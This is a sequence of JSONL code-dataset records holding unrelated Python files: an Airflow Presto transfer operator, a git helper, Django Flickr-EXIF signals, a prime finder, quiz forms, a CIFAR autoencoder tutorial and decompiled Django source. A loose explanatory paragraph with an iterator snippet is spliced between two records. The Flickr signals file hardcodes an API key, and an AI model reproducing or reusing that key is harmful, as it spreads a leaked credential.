\"BOOLEAN\": \"BOOL\",\n \"TINYINT\": \"INT64\",\n \"SMALLINT\": \"INT64\",\n \"INTEGER\": \"INT64\",\n \"BIGINT\": \"INT64\",\n \"REAL\": \"FLOAT64\",\n \"DOUBLE\": \"FLOAT64\",\n \"DECIMAL\": \"NUMERIC\",\n \"VARCHAR\": \"STRING\",\n \"CHAR\": \"STRING\",\n \"VARBINARY\": \"BYTES\",\n \"JSON\": \"STRING\",\n \"DATE\": \"DATE\",\n \"TIME\": \"TIME\",\n # BigQuery don't time with timezone native.\n \"TIME WITH TIME ZONE\": \"STRING\",\n \"TIMESTAMP\": \"TIMESTAMP\",\n # BigQuery supports a narrow range of time zones during import.\n # You should use TIMESTAMP function, if you want have TIMESTAMP type\n \"TIMESTAMP WITH TIME ZONE\": \"STRING\",\n \"IPADDRESS\": \"STRING\",\n \"UUID\": \"STRING\",\n }\n\n def __init__(self, *, presto_conn_id: str = \"presto_default\", **kwargs):\n super().__init__(**kwargs)\n self.presto_conn_id = presto_conn_id\n\n def query(self):\n \"\"\"Queries presto and returns a cursor to the results.\"\"\"\n presto = PrestoHook(presto_conn_id=self.presto_conn_id)\n conn = presto.get_conn()\n cursor = conn.cursor()\n self.log.info(\"Executing: %s\", self.sql)\n cursor.execute(self.sql)\n return _PrestoToGCSPrestoCursorAdapter(cursor)\n\n def field_to_bigquery(self, field) -> dict[str, str]:\n \"\"\"Convert presto field type to BigQuery field type.\"\"\"\n clear_field_type = field[1].upper()\n # remove type argument e.g. DECIMAL(2, 10) => DECIMAL\n clear_field_type, _, _ = clear_field_type.partition(\"(\")\n new_field_type = self.type_map.get(clear_field_type, \"STRING\")\n\n return {\"name\": field[0], \"type\": new_field_type}\n\n def convert_type(self, value, schema_type, **kwargs):\n \"\"\"\n Do nothing. Presto uses JSON on the transport layer, so types are simple.\n\n :param value: Presto column value\n :param schema_type: BigQuery data type\n \"\"\"\n return value\n","sub_path":"airflow/providers/google/cloud/transfers/presto_to_gcs.py","file_name":"presto_to_gcs.py","file_ext":"py","file_size_in_byte":7190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
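The cursor adapter above implements peeking by pushing the fetched row back onto an internal buffer; the same pattern works for any iterator. A dependency-free sketch with a hypothetical `Peekable` class:

```python
class Peekable:
    """Wrap an iterator so the next item can be inspected without consuming it."""
    _SENTINEL = object()

    def __init__(self, iterable):
        self._it = iter(iterable)
        self._buffer = []

    def peek(self, default=_SENTINEL):
        # Fill the one-item buffer on demand, mirroring peekone() above.
        if not self._buffer:
            try:
                self._buffer.append(next(self._it))
            except StopIteration:
                if default is self._SENTINEL:
                    raise
                return default
        return self._buffer[0]

    def __iter__(self):
        return self

    def __next__(self):
        # Serve the buffered item first, then fall back to the underlying iterator.
        if self._buffer:
            return self._buffer.pop(0)
        return next(self._it)

rows = Peekable([(1, "a"), (2, "b")])
print(rows.peek())  # (1, 'a'), not consumed
print(list(rows))   # [(1, 'a'), (2, 'b')]
```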
+{"seq_id":"498890623","text":"\n# Copyright Jamie Allsop 2014-2015\n# Distributed under the Boost Software License, Version 1.0.\n# (See accompanying file LICENSE_1_0.txt or copy at\n# http://www.boost.org/LICENSE_1_0.txt)\n\n#-------------------------------------------------------------------------------\n# Git Source Control Management System\n#-------------------------------------------------------------------------------\n\nimport subprocess\nimport shlex\nimport os\nfrom exceptions import Exception\n\n\nclass GitException(Exception):\n def __init__(self, value):\n self.parameter = value\n def __str__(self):\n return repr(self.parameter)\n\n\ndef info( path ):\n if not path:\n raise GitException(\"No working copy path specified for calling git commands with.\")\n\n url = None\n repository = None\n branch = None\n revision = None\n\n if not os.path.exists( os.path.join( path, \".git\" ) ):\n raise GitException(\"Not a Git working copy\")\n\n try:\n command = \"git describe --always\"\n revision = subprocess.check_output( shlex.split( command ), stderr=subprocess.STDOUT, cwd=path ).strip()\n\n command = \"git symbolic-ref HEAD\"\n branch = subprocess.check_output( shlex.split( command ), stderr=subprocess.STDOUT, cwd=path )\n branch = branch.replace( \"refs/heads/\", \"\" ).strip()\n\n command = \"git config --get remote.origin.url\"\n repository = subprocess.check_output( shlex.split( command ), stderr=subprocess.STDOUT, cwd=path ).strip()\n url = repository\n\n except subprocess.CalledProcessError:\n raise GitException(\"Not a Git working copy\")\n\n return url, repository, branch, revision\n\n","sub_path":"cuppa/scms/git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"185581054","text":"from django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom .models import Picture, Make, Lens, Camera\nimport requests\n\nFLICKR_API_URL = 'https://api.flickr.com/services/rest/'\nFLICKR_DISPLAY_PHOTO_URL = 'https://farm{}.staticflickr.com/{}/{}_{}_k.jpg'\n\ndef get_exif_data(picture_id):\n data = {}\n params = {\n 'format': 'json',\n 'nojsoncallback': 1,\n 'photo_id': picture_id,\n 'api_key': 'f665c808bb573b05caf029298373ec9e'\n }\n\n # EXIF\n response = requests.get(FLICKR_API_URL,\n params={**params,**{'method': 'flickr.photos.getExif'}}).json()\n response = response['photo']['exif']\n tags = ['ISO', 'FocalLengthIn35mmFormat', 'FNumber', 'ExposureTime', 'Make', 'Lens', 'Model']\n for tag in tags:\n try:\n data[tag] = [x for x in response if x['tag'] == tag][0]['raw']['_content']\n except:\n data[tag] = None\n # Photo data\n response = requests.get(FLICKR_API_URL,\n params={**params,**{'method': 'flickr.photos.getInfo'}}).json()\n\n response = response['photo']\n data['name'] = response['title']['_content']\n data['url'] = response['urls']['url'][0]['_content']\n # Display sizes\n response = requests.get(FLICKR_API_URL,\n params={**params,**{'method': 'flickr.photos.getSizes'}}).json()\n data['display-url'] = response['sizes']['size'][-2]['source']\n return data\n\n\ndef update_picture_exif(picture):\n data = get_exif_data(picture.flickr_id)\n picture.display_url = data['display-url']\n if False:\n picture.url = data['url']\n picture.aperture = float(data['FNumber']) if data['FNumber'] is not None else None\n picture.focal_length = int(float(data['FocalLengthIn35mmFormat'].split(' ')[0])) if data['FocalLengthIn35mmFormat'] is not None else None\n picture.shutter_speed = data['ExposureTime']\n picture.iso = int(data['ISO']) if data['ISO'] is not None else None\n picture.name = data['name']\n\n if data['Make'] is not None:\n make = data['Make'].lower()\n make = make[0].upper()+make[1:]\n make_already_exist = Make.objects.filter(name=make).exists()\n if not make_already_exist:\n Make.objects.create(name=make)\n make = Make.objects.filter(name=make).first()\n\n if data['Lens'] is not None and picture.lens is None:\n if not Lens.objects.filter(model=data['Lens'], make=make).exists():\n lens = Lens.objects.create(model=data['Lens'], make=make)\n else:\n lens = Lens.objects.filter(model=data['Lens'], make=make).first()\n picture.lens = lens\n\n if data['Model'] is not None and picture.camera is None:\n if not Camera.objects.filter(model=data['Model'], make=make).exists():\n camera = Camera.objects.create(model=data['Model'], make=make)\n else:\n camera = Camera.objects.filter(model=data['Model'], make=make).first()\n picture.camera = camera\n\n post_save.disconnect(save_picture, sender=Picture)\n picture.save()\n post_save.connect(save_picture, sender=Picture)\n\n\n@receiver(post_save, sender=Picture)\ndef create_picture(sender, instance, created, **kwargs):\n if created:\n update_picture_exif(instance)\n\n\n@receiver(post_save, sender=Picture)\ndef save_picture(sender, instance, **kwargs):\n #update_picture_exif(instance)\n pass\n\n\ndef init_signals():\n pass\n","sub_path":"gallery/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"649378598","text":"count = 1;\r\nnum = 1;\r\nprime = 0;\r\nwhile(count < 10001):\r\n\tnum = num + 2;\r\n\tp = True;\r\n\tfor i in range(2, num):\r\n\t\tif(num % i == 0):\r\n\t\t\tp = False;\r\n\t\t\tbreak;\r\n\tif(p == True):\r\n\t\tprime = num;\r\n\t\tcount = count + 1;\r\n\t\tprint(count);\r\nprint(prime);\r\n","sub_path":"10001st prime.py","file_name":"10001st prime.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"460137075","text":"from django import forms\nfrom django.forms.models import inlineformset_factory\nfrom django.forms.widgets import RadioSelect\n\nfrom .models import MCQQuestion, Answer, Quiz\n\n\nclass QuestionForm(forms.Form):\n def __init__(self, question, *args, **kwargs):\n super(QuestionForm, self).__init__(*args, **kwargs)\n choice_list = [x for x in question.get_answers_list()]\n self.fields[\"answers\"] = forms.ChoiceField(choices=choice_list, widget=RadioSelect)\n\n\nMCQFormSet = inlineformset_factory(MCQQuestion,\n Answer,\n fields=['content',\n 'correct'],\n extra=4,\n can_delete=True,\n )\n\n\nclass QuizCreateForm(forms.ModelForm):\n class Meta:\n model = Quiz\n exclude = ['course', 'slug', 'random_order', 'answers_at_end']\n\n\nclass MCQCreateForm(forms.ModelForm):\n class Meta:\n model = MCQQuestion\n exclude = ['course', 'quiz', 'answer_order']\n\n# class AnswerForm(forms.ModelForm):\n# class Meta:\n# model = Answer\n# exclude = ['question']\n#\n","sub_path":"aonebrains_quiz/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"141528946","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n@author: VictorGueorguiev\n\"\"\"\n\n# code inspired by the following tutorial: \n#https://uvadlc-notebooks.readthedocs.io/en/latest/tutorial_notebooks/tutorial9/AE_CIFAR10.html#Building-the-autoencoder\n\n## Standard libraries\nimport os\nimport json\nimport math\nimport numpy as np\n\n## Imports for plotting\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import to_rgb\nimport matplotlib\nmatplotlib.rcParams['lines.linewidth'] = 2.0\nimport seaborn as sns\nsns.reset_orig()\nsns.set()\n\n## Progress bar\nfrom tqdm.notebook import tqdm\n\n## PyTorch\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data as data\nimport torch.optim as optim\n# Torchvision\nimport torchvision\nfrom torchvision.datasets import CIFAR10\nfrom torchvision import transforms\n# PyTorch Lightning\nimport pytorch_lightning as pl\n\nfrom pytorch_lightning.callbacks import LearningRateMonitor, ModelCheckpoint\n\n# Tensorboard extension (for visualization purposes later)\nfrom torch.utils.tensorboard import SummaryWriter\n\nclass Encoder(nn.Module):\n\n def __init__(self,\n num_input_channels : int,\n base_channel_size : int,\n latent_dim : int,\n act_fn : object = nn.GELU):\n \"\"\"\n Inputs:\n - num_input_channels : Number of input channels of the image. For CIFAR, this parameter is 3\n - base_channel_size : Number of channels we use in the first convolutional layers. Deeper layers might use a duplicate of it.\n - latent_dim : Dimensionality of latent representation z\n - act_fn : Activation function used throughout the encoder network\n \"\"\"\n super().__init__()\n c_hid = base_channel_size\n self.net = nn.Sequential(\n nn.Conv2d(num_input_channels, c_hid, kernel_size=3, padding=1, stride=2), # 32x32 => 16x16\n act_fn(),\n nn.Conv2d(c_hid, c_hid, kernel_size=3, padding=1),\n act_fn(),\n nn.Conv2d(c_hid, 2*c_hid, kernel_size=3, padding=1, stride=2), # 16x16 => 8x8\n act_fn(),\n nn.Conv2d(2*c_hid, 2*c_hid, kernel_size=3, padding=1),\n act_fn(),\n nn.Conv2d(2*c_hid, 2*c_hid, kernel_size=3, padding=1, stride=2), # 8x8 => 4x4\n act_fn(),\n nn.Flatten(), # Image grid to single feature vector\n nn.Linear(2*16*c_hid, latent_dim)\n )\n\n def forward(self, x):\n return self.net(x)\n\nclass Decoder(nn.Module):\n\n def __init__(self,\n num_input_channels : int,\n base_channel_size : int,\n latent_dim : int,\n act_fn : object = nn.GELU):\n \"\"\"\n Inputs:\n - num_input_channels : Number of channels of the image to reconstruct. For CIFAR, this parameter is 3\n - base_channel_size : Number of channels we use in the last convolutional layers. 
Early layers might use a duplicate of it.\n - latent_dim : Dimensionality of latent representation z\n - act_fn : Activation function used throughout the decoder network\n \"\"\"\n super().__init__()\n c_hid = base_channel_size\n self.linear = nn.Sequential(\n nn.Linear(latent_dim, 2*16*c_hid),\n act_fn()\n )\n self.net = nn.Sequential(\n nn.ConvTranspose2d(2*c_hid, 2*c_hid, kernel_size=3, output_padding=1, padding=1, stride=2), # 4x4 => 8x8\n act_fn(),\n nn.Conv2d(2*c_hid, 2*c_hid, kernel_size=3, padding=1),\n act_fn(),\n nn.ConvTranspose2d(2*c_hid, c_hid, kernel_size=3, output_padding=1, padding=1, stride=2), # 8x8 => 16x16\n act_fn(),\n nn.Conv2d(c_hid, c_hid, kernel_size=3, padding=1),\n act_fn(),\n nn.ConvTranspose2d(c_hid, num_input_channels, kernel_size=3, output_padding=1, padding=1, stride=2), # 16x16 => 32x32\n nn.Tanh() # The input images is scaled between -1 and 1, hence the output has to be bounded as well\n )\n\n def forward(self, x):\n x = self.linear(x)\n x = x.reshape(x.shape[0], -1, 4, 4)\n x = self.net(x)\n return x\n \nclass Autoencoder(pl.LightningModule):\n\n def __init__(self,\n base_channel_size: int,\n latent_dim: int,\n encoder_class : object = Encoder,\n decoder_class : object = Decoder,\n num_input_channels: int = 3,\n width: int = 32,\n height: int = 32):\n super().__init__()\n # Saving hyperparameters of autoencoder\n self.save_hyperparameters()\n # Creating encoder and decoder\n self.encoder = encoder_class(num_input_channels, base_channel_size, latent_dim)\n self.decoder = decoder_class(num_input_channels, base_channel_size, latent_dim)\n # Example input array needed for visualizing the graph of the network\n self.example_input_array = torch.zeros(2, num_input_channels, width, height)\n\n def forward(self, x):\n \"\"\"\n The forward function takes in an image and returns the reconstructed image\n \"\"\"\n z = self.encoder(x)\n x_hat = self.decoder(z)\n return x_hat\n\n def _get_reconstruction_loss(self, batch):\n \"\"\"\n Given a batch of images, this function returns the reconstruction loss (MSE in our case)\n \"\"\"\n x, _ = batch # We do not need the labels\n x_hat = self.forward(x)\n loss = F.mse_loss(x, x_hat, reduction=\"none\")\n loss = loss.sum(dim=[1,2,3]).mean(dim=[0])\n return loss\n\n def configure_optimizers(self):\n optimizer = optim.Adam(self.parameters(), lr=1e-3)\n # Using a scheduler is optional but can be helpful.\n # The scheduler reduces the LR if the validation performance hasn't improved for the last N epochs\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer,\n mode='min',\n factor=0.2,\n patience=20,\n min_lr=5e-5)\n return {\"optimizer\": optimizer, \"lr_scheduler\": scheduler, \"monitor\": \"val_loss\"}\n\n def training_step(self, batch, batch_idx):\n loss = self._get_reconstruction_loss(batch)\n self.log('train_loss', loss)\n return loss\n\n def validation_step(self, batch, batch_idx):\n loss = self._get_reconstruction_loss(batch)\n self.log('val_loss', loss)\n\n def test_step(self, batch, batch_idx):\n loss = self._get_reconstruction_loss(batch)\n self.log('test_loss', loss)\n\nclass GenerateCallback(pl.Callback):\n\n def __init__(self, input_imgs, every_n_epochs=1):\n super().__init__()\n self.input_imgs = input_imgs # Images to reconstruct during training\n self.every_n_epochs = every_n_epochs # Only save those images every N epochs (otherwise tensorboard gets quite large)\n\n def on_epoch_end(self, trainer, pl_module):\n if trainer.current_epoch % self.every_n_epochs == 0:\n # Reconstruct images\n input_imgs = 
self.input_imgs.to(pl_module.device)\n with torch.no_grad():\n pl_module.eval()\n reconst_imgs = pl_module(input_imgs)\n pl_module.train()\n # Plot and add to tensorboard\n imgs = torch.stack([input_imgs, reconst_imgs], dim=1).flatten(0,1)\n grid = torchvision.utils.make_grid(imgs, nrow=2, normalize=True, range=(-1,1))\n trainer.logger.experiment.add_image(\"Reconstructions\", grid, global_step=trainer.global_step)\n\ndef compare_imgs(img1, img2, title_prefix=\"\"):\n # Calculate MSE loss between both images\n loss = F.mse_loss(img1, img2, reduction=\"sum\")\n # Plot images for visual comparison\n grid = torchvision.utils.make_grid(torch.stack([img1, img2], dim=0), nrow=2, normalize=True, range=(-1,1))\n grid = grid.permute(1, 2, 0)\n plt.figure(figsize=(4,2))\n plt.title(\"%s Loss: %4.2f\" % (title_prefix, loss.item()))\n plt.imshow(grid)\n plt.axis('off')\n plt.show()\n \ndef visualize_reconstructions(model, input_imgs):\n # Reconstruct images\n model.eval()\n with torch.no_grad():\n reconst_imgs = model(input_imgs.to(model.device))\n reconst_imgs = reconst_imgs.cpu()\n\n # Plotting\n imgs = torch.stack([input_imgs, reconst_imgs], dim=1).flatten(0,1)\n grid = torchvision.utils.make_grid(imgs, nrow=4, normalize=True, range=(-1,1))\n grid = grid.permute(1, 2, 0)\n plt.figure(figsize=(7,4.5))\n plt.title(\"Reconstructed from %i latents\" % (model.hparams.latent_dim))\n plt.imshow(grid)\n plt.axis('off')\n plt.show()\n \ndef train_cifar(latent_dim):\n # Create a PyTorch Lightning trainer with the generation callback\n trainer = pl.Trainer(default_root_dir=os.path.join(CHECKPOINT_PATH, \"cifar10_%i\" % latent_dim),\n gpus=1 if str(device).startswith(\"cuda\") else 0,\n max_epochs=500,\n callbacks=[ModelCheckpoint(save_weights_only=True),\n GenerateCallback(get_train_images(8), every_n_epochs=10),\n LearningRateMonitor(\"epoch\")])\n trainer.logger._log_graph = True # If True, we plot the computation graph in tensorboard\n trainer.logger._default_hp_metric = None # Optional logging argument that we don't need\n\n # Check whether pretrained model exists. If yes, load it and skip training\n pretrained_filename = os.path.join(CHECKPOINT_PATH, \"cifar10_%i.ckpt\" % latent_dim)\n if os.path.isfile(pretrained_filename):\n print(\"Found pretrained model, loading...\")\n model = Autoencoder.load_from_checkpoint(pretrained_filename)\n else:\n model = Autoencoder(base_channel_size=32, latent_dim=latent_dim)\n trainer.fit(model, train_loader, val_loader)\n # Test best model on validation and test set\n val_result = trainer.test(model, test_dataloaders=val_loader, verbose=False)\n test_result = trainer.test(model, test_dataloaders=test_loader, verbose=False)\n result = {\"test\": test_result, \"val\": val_result}\n return model, result\n\n# Path to the folder where the datasets are/should be downloaded (e.g. CIFAR10)\nDATASET_PATH = \"../data\"\n# Path to the folder where the pretrained models are saved\nCHECKPOINT_PATH = \"../saved_models/tutorial9\"\n\ndef get_train_images(num):\n return torch.stack([cifar10_dataset[i][0] for i in range(num)], dim=0)\n\n# Transformations applied on each image => only make them a tensor\ntransform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.5,),(0.5,))])\n\n# Loading the training dataset. 
We need to split it into a training and validation part\ntrain_dataset = CIFAR10(root=DATASET_PATH, train=True, transform=transform, download=True)\npl.seed_everything(42)\ntrain_set, val_set = torch.utils.data.random_split(train_dataset, [45000, 5000])\n\n# Loading the test set\ntest_set = CIFAR10(root=DATASET_PATH, train=False, transform=transform, download=True)\n\n# We define a set of data loaders that we can use for various purposes later.\ntrain_loader = data.DataLoader(train_set, batch_size=256, shuffle=True, drop_last=True, pin_memory=True, num_workers=4)\nval_loader = data.DataLoader(val_set, batch_size=256, shuffle=False, drop_last=False, num_workers=4)\ntest_loader = data.DataLoader(test_set, batch_size=256, shuffle=False, drop_last=False, num_workers=4)\n\n# Ensure that all operations are deterministic on GPU (if used) for reproducibility\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\ndevice = torch.device(\"cuda:0\") if torch.cuda.is_available() else torch.device(\"cpu\")\nprint(\"Device:\", device)\n\nfor i in range(2):\n    # Load example image\n    img, _ = train_dataset[i]\n    img_mean = img.mean(dim=[1,2], keepdims=True)\n\n    # Shift image by one pixel\n    SHIFT = 1\n    img_shifted = torch.roll(img, shifts=SHIFT, dims=1)\n    img_shifted = torch.roll(img_shifted, shifts=SHIFT, dims=2)\n    img_shifted[:,:1,:] = img_mean\n    img_shifted[:,:,:1] = img_mean\n    compare_imgs(img, img_shifted, \"Shifted -\")\n\n    # Set half of the image to zero\n    img_masked = img.clone()\n    img_masked[:,:img_masked.shape[1]//2,:] = img_mean\n    compare_imgs(img, img_masked, \"Masked -\")\n\nmodel_dict = {}\nfor latent_dim in [64, 128, 256, 384]:\n    model_ld, result_ld = train_cifar(latent_dim)\n    model_dict[latent_dim] = {\"model\": model_ld, \"result\": result_ld}\n\ninput_imgs = get_train_images(32)\nfor latent_dim in model_dict:\n    visualize_reconstructions(model_dict[latent_dim][\"model\"], input_imgs)\n","sub_path":"code/autoencoder_cifar.py","file_name":"autoencoder_cifar.py","file_ext":"py","file_size_in_byte":12859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
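`_get_reconstruction_loss` above sums the squared error over the channel and spatial dimensions of each image, then averages over the batch. A tiny self-contained check of that reduction on random tensors:

```python
import torch
import torch.nn.functional as F

x = torch.randn(8, 3, 32, 32)           # a fake batch of CIFAR-sized images
x_hat = x + 0.1 * torch.randn_like(x)   # a noisy "reconstruction"

loss = F.mse_loss(x, x_hat, reduction="none")   # elementwise squared error
loss = loss.sum(dim=[1, 2, 3]).mean(dim=[0])    # sum per image, mean over batch

# Equivalent closed form: per-image SSE averaged across the batch.
manual = ((x - x_hat) ** 2).reshape(8, -1).sum(dim=1).mean()
assert torch.allclose(loss, manual)
print(loss.item())
```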
+{"seq_id":"648947894","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /tmp/pip-install-jkXn_D/django/django/db/models/options.py\n# Compiled at: 2018-07-11 18:15:30\nfrom __future__ import unicode_literals\nimport re\nfrom bisect import bisect\nfrom django.conf import settings\nfrom django.db.models.related import RelatedObject\nfrom django.db.models.fields.related import ManyToManyRel\nfrom django.db.models.fields import AutoField, FieldDoesNotExist\nfrom django.db.models.fields.proxy import OrderWrt\nfrom django.db.models.loading import get_models, app_cache_ready\nfrom django.utils import six\nfrom django.utils.datastructures import SortedDict\nfrom django.utils.encoding import force_text, smart_text, python_2_unicode_compatible\nfrom django.utils.translation import activate, deactivate_all, get_language, string_concat\nget_verbose_name = lambda class_name: re.sub(b'(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))', b' \\\\1', class_name).lower().strip()\nDEFAULT_NAMES = ('verbose_name', 'verbose_name_plural', 'db_table', 'ordering', 'unique_together',\n 'permissions', 'get_latest_by', 'order_with_respect_to', 'app_label',\n 'db_tablespace', 'abstract', 'managed', 'proxy', 'swappable', 'auto_created',\n 'index_together')\n\n@python_2_unicode_compatible\nclass Options(object):\n\n def __init__(self, meta, app_label=None):\n self.local_fields, self.local_many_to_many = [], []\n self.virtual_fields = []\n self.module_name, self.verbose_name = (None, None)\n self.verbose_name_plural = None\n self.db_table = b''\n self.ordering = []\n self.unique_together = []\n self.index_together = []\n self.permissions = []\n self.object_name, self.app_label = None, app_label\n self.get_latest_by = None\n self.order_with_respect_to = None\n self.db_tablespace = settings.DEFAULT_TABLESPACE\n self.admin = None\n self.meta = meta\n self.pk = None\n self.has_auto_field, self.auto_field = False, None\n self.abstract = False\n self.managed = True\n self.proxy = False\n self.proxy_for_model = None\n self.concrete_model = None\n self.swappable = None\n self.parents = SortedDict()\n self.duplicate_targets = {}\n self.auto_created = False\n self.abstract_managers = []\n self.concrete_managers = []\n self.related_fkey_lookups = []\n return\n\n def contribute_to_class(self, cls, name):\n from django.db import connection\n from django.db.backends.util import truncate_name\n cls._meta = self\n self.installed = re.sub(b'\\\\.models$', b'', cls.__module__) in settings.INSTALLED_APPS\n self.object_name = cls.__name__\n self.module_name = self.object_name.lower()\n self.verbose_name = get_verbose_name(self.object_name)\n if self.meta:\n meta_attrs = self.meta.__dict__.copy()\n for name in self.meta.__dict__:\n if name.startswith(b'_'):\n del meta_attrs[name]\n\n for attr_name in DEFAULT_NAMES:\n if attr_name in meta_attrs:\n setattr(self, attr_name, meta_attrs.pop(attr_name))\n elif hasattr(self.meta, attr_name):\n setattr(self, attr_name, getattr(self.meta, attr_name))\n\n ut = meta_attrs.pop(b'unique_together', self.unique_together)\n if ut and not isinstance(ut[0], (tuple, list)):\n ut = (\n ut,)\n self.unique_together = ut\n if self.verbose_name_plural is None:\n self.verbose_name_plural = string_concat(self.verbose_name, b's')\n if meta_attrs != {}:\n raise TypeError(b\"'class Meta' got invalid attribute(s): %s\" % (b',').join(meta_attrs.keys()))\n else:\n self.verbose_name_plural = 
string_concat(self.verbose_name, b's')\n        del self.meta\n        if not self.db_table:\n            self.db_table = b'%s_%s' % (self.app_label, self.module_name)\n            self.db_table = truncate_name(self.db_table, connection.ops.max_name_length())\n        return\n\n    def _prepare(self, model):\n        if self.order_with_respect_to:\n            self.order_with_respect_to = self.get_field(self.order_with_respect_to)\n            self.ordering = ('_order', )\n            model.add_to_class(b'_order', OrderWrt())\n        else:\n            self.order_with_respect_to = None\n        if self.pk is None:\n            if self.parents:\n                field = next(six.itervalues(self.parents))\n                already_created = [ fld for fld in self.local_fields if fld.name == field.name ]\n                if already_created:\n                    field = already_created[0]\n                field.primary_key = True\n                self.setup_pk(field)\n            else:\n                auto = AutoField(verbose_name=b'ID', primary_key=True, auto_created=True)\n                model.add_to_class(b'id', auto)\n        collections = {}\n        for column, target in six.iteritems(self.duplicate_targets):\n            try:\n                collections[target].add(column)\n            except KeyError:\n                collections[target] = set([column])\n\n        self.duplicate_targets = {}\n        for elt in six.itervalues(collections):\n            if len(elt) == 1:\n                continue\n            for column in elt:\n                self.duplicate_targets[column] = elt.difference(set([column]))\n\n        return\n\n    def add_field(self, field):\n        if field.rel and isinstance(field.rel, ManyToManyRel):\n            self.local_many_to_many.insert(bisect(self.local_many_to_many, field), field)\n            if hasattr(self, b'_m2m_cache'):\n                del self._m2m_cache\n        else:\n            self.local_fields.insert(bisect(self.local_fields, field), field)\n            self.setup_pk(field)\n            if hasattr(self, b'_field_cache'):\n                del self._field_cache\n                del self._field_name_cache\n        if hasattr(self, b'_name_map'):\n            del self._name_map\n\n    def add_virtual_field(self, field):\n        self.virtual_fields.append(field)\n\n    def setup_pk(self, field):\n        if not self.pk and field.primary_key:\n            self.pk = field\n            field.serialize = False\n\n    def pk_index(self):\n        \"\"\"\n        Returns the index of the primary key field in the self.fields list.\n        \"\"\"\n        return self.fields.index(self.pk)\n\n    def setup_proxy(self, target):\n        \"\"\"\n        Does the internal setup so that the current model is a proxy for\n        \"target\".\n        \"\"\"\n        self.pk = target._meta.pk\n        self.proxy_for_model = target\n        self.db_table = target._meta.db_table\n\n    def __repr__(self):\n        return b'<Options for %s>' % self.object_name\n\n    def __str__(self):\n        return b'%s.%s' % (smart_text(self.app_label), smart_text(self.module_name))\n\n    def verbose_name_raw(self):\n        \"\"\"\n        There are a few places where the untranslated verbose name is needed\n        (so that we get the same value regardless of currently active\n        locale).\n        \"\"\"\n        lang = get_language()\n        deactivate_all()\n        raw = force_text(self.verbose_name)\n        activate(lang)\n        return raw\n\n    verbose_name_raw = property(verbose_name_raw)\n\n    def _swapped(self):\n        \"\"\"\n        Has this model been swapped out for another? 
If so, return the model\n name of the replacement; otherwise, return None.\n\n For historical reasons, model name lookups using get_model() are\n case insensitive, so we make sure we are case insensitive here.\n \"\"\"\n if self.swappable:\n model_label = b'%s.%s' % (self.app_label, self.object_name.lower())\n swapped_for = getattr(settings, self.swappable, None)\n if swapped_for:\n try:\n swapped_label, swapped_object = swapped_for.split(b'.')\n except ValueError:\n return swapped_for\n\n if b'%s.%s' % (swapped_label, swapped_object.lower()) not in (None, model_label):\n return swapped_for\n return\n\n swapped = property(_swapped)\n\n def _fields(self):\n \"\"\"\n The getter for self.fields. This returns the list of field objects\n available to this model (including through parent models).\n\n Callers are not permitted to modify this list, since it's a reference\n to this instance (not a copy).\n \"\"\"\n try:\n self._field_name_cache\n except AttributeError:\n self._fill_fields_cache()\n\n return self._field_name_cache\n\n fields = property(_fields)\n\n def get_fields_with_model(self):\n \"\"\"\n Returns a sequence of (field, model) pairs for all fields. The \"model\"\n element is None for fields on the current model. Mostly of use when\n constructing queries so that we know which model a field belongs to.\n \"\"\"\n try:\n self._field_cache\n except AttributeError:\n self._fill_fields_cache()\n\n return self._field_cache\n\n def _fill_fields_cache(self):\n cache = []\n for parent in self.parents:\n for field, model in parent._meta.get_fields_with_model():\n if model:\n cache.append((field, model))\n else:\n cache.append((field, parent))\n\n cache.extend([ (f, None) for f in self.local_fields ])\n self._field_cache = tuple(cache)\n self._field_name_cache = [ x for x, _ in cache ]\n return\n\n def _many_to_many(self):\n try:\n self._m2m_cache\n except AttributeError:\n self._fill_m2m_cache()\n\n return list(self._m2m_cache)\n\n many_to_many = property(_many_to_many)\n\n def get_m2m_with_model(self):\n \"\"\"\n The many-to-many version of get_fields_with_model().\n \"\"\"\n try:\n self._m2m_cache\n except AttributeError:\n self._fill_m2m_cache()\n\n return list(six.iteritems(self._m2m_cache))\n\n def _fill_m2m_cache(self):\n cache = SortedDict()\n for parent in self.parents:\n for field, model in parent._meta.get_m2m_with_model():\n if model:\n cache[field] = model\n else:\n cache[field] = parent\n\n for field in self.local_many_to_many:\n cache[field] = None\n\n self._m2m_cache = cache\n return\n\n def get_field(self, name, many_to_many=True):\n \"\"\"\n Returns the requested field by name. Raises FieldDoesNotExist on error.\n \"\"\"\n to_search = many_to_many and self.fields + self.many_to_many or self.fields\n for f in to_search:\n if f.name == name:\n return f\n\n raise FieldDoesNotExist(b'%s has no field named %r' % (self.object_name, name))\n\n def get_field_by_name(self, name):\n \"\"\"\n Returns the (field_object, model, direct, m2m), where field_object is\n the Field instance for the given name, model is the model containing\n this field (None for local fields), direct is True if the field exists\n on this model, and m2m is True for many-to-many relations. 
